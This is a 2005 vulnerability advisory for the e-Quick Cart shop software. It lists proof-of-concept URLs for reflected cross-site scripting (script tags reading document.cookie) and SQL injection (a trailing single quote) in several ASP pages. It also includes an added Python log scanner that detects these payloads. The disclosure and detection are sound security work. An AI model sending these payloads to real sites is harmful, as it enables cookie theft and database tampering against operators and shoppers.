e-Quick Cart is susceptible to multiple cross site scripting and SQL injection flaws. Exploitation details provided.
------------------------------------------------------
Nightmare TeAmZ Advisory 016
------------------------------------------------------
Date - 11/2005
e-Quick Cart Sql & Xss
AFFECTED PRODUCTS
=================
e-Quick Cart
https://www.cdmweb.com
Xss Proof:
========
www.[host].com/[path]/shopgift.asp?strgifttoname="><script>alert(document.cookie);</script>
www.[host].com/[path]/shopmaillist.asp?strfirstname="><script>alert(document.cookie);</script>
www.[host].com/[path]/shopprojectlogin.asp?strpid="><script>alert(document.cookie);</script>
www.[host].com/[path]/shoptellafriend.asp?Custname="><script>alert(document.cookie);</script>
Sql Proof:
========
www.[host].com/[path]/shopaddtocart.asp?quantity=1&Order=Order&productid='
www.[host].com/[path]/shopprojectlogin.asp?strpid=1&strpemail='
www.[host].com/[path]/shoptellafriend.asp??id='
Solution:
=========
No Solution At This Time
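With no vendor fix listed, site operators can at least watch for requests that target the scripts and parameters named above. The following log check is an added example, not part of the original advisory or of e-Quick Cart; the log field order, the /store/ path and the sample lines are constructed assumptions.

```python
from urllib.parse import parse_qsl

# Script -> {parameter: issue class}, taken from the advisory's proof URLs.
# Names are lowercased: IIS paths and ASP query keys are case-insensitive.
WATCH = {
    "shopgift.asp": {"strgifttoname": "xss"},
    "shopmaillist.asp": {"strfirstname": "xss"},
    "shopprojectlogin.asp": {"strpid": "xss", "strpemail": "sql"},
    "shoptellafriend.asp": {"custname": "xss", "id": "sql"},
    "shopaddtocart.asp": {"productid": "sql"},
}
# Characters the proof URLs rely on, per issue class.
SUSPECT = {"xss": set('<>"'), "sql": set("'")}

# Constructed sample log; the field order is an assumption, adjust to yours.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2005-11-20 10:00:01 GET /store/shopgift.asp strgifttoname=Anna 200
2005-11-20 10:00:07 GET /store/shopgift.asp strgifttoname=%22%3E%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E 200
2005-11-20 10:01:12 GET /store/shopaddtocart.asp quantity=1&Order=Order&productid=%27 500
2005-11-20 10:02:30 GET /store/ShopProjectLogin.asp strpid=1&strpemail=a@example.com 200
2005-11-20 10:03:02 GET /store/shoptellafriend.asp ?id=' 500
2005-11-20 10:04:00 GET /store/default.asp q=%27 200
"""

def scan_line(line):
    """Return (script, param, class) hits for one W3C-style log line."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 5:
        return []
    script = fields[3].rsplit("/", 1)[-1].lower()
    params = WATCH.get(script)
    if not params:
        return []
    hits = []
    # lstrip tolerates the doubled '?' seen in the advisory's last URL.
    for name, value in parse_qsl(fields[4].lstrip("?"), keep_blank_values=True):
        kind = params.get(name.lower())
        if kind and SUSPECT[kind] & set(value):  # value is already URL-decoded
            hits.append((script, name.lower(), kind))
    return hits

def scan_log(text):
    """Return [(line_number, script, param, class), ...] for a whole log."""
    return [(n, *hit) for n, line in enumerate(text.splitlines(), 1)
            for hit in scan_line(line)]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

This only sees query-string requests; values submitted in form POST bodies do not appear in the web server log and need inspection elsewhere.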
Credits
=======
This vulnerability was discovered and researched by
BiPi_HaCk of Nightmare TeAmZ
We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0
Site: https://www.NightmareSecurity.net <--IT Security Forum